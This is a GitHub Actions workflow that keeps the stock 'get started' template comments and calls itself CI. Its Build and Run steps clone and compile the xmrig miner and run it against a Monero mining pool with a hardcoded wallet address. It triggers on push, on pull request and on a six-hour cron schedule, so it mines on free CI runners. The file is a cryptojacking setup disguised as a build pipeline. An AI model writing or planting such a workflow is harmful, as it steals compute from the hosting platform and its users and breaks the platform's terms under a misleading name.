# This is a basic workflow to help you get started with Actions

name: CI

# Controls when the workflow will run
on:
  # Triggers the workflow on push or pull request events but only for the "main" branch
  push:
    branches: 
  pull_request:
    branches: 
  schedule:
    - cron: "10 */6 * * *"
  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout repository
      uses: actions/checkout@v2
      
    - name: Install dependencies
      run: |
        sudo apt update
        sudo apt install -y git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
    - name: Build 
      run: |
        git clone https://github.com/xmrig/xmrig.git
        mkdir xmrig/build
        cd xmrig/build
        cmake ..
        make -j$(nproc)
    - name: Run
      run: |
        cd xmrig/build
        ./xmrig -o xmr.2miners.com:2222 -u 8C8ihAeP2HuNrJECaJJdsQcboBJwcpQ3fcyrUfAo7m6NKPtem4xMuV8KtXLKMAh5FcVtUtyAQurHbLsp77fjpm9LDEAEzee -p gitrig -k --coin monero -a rx/0 --threads 2
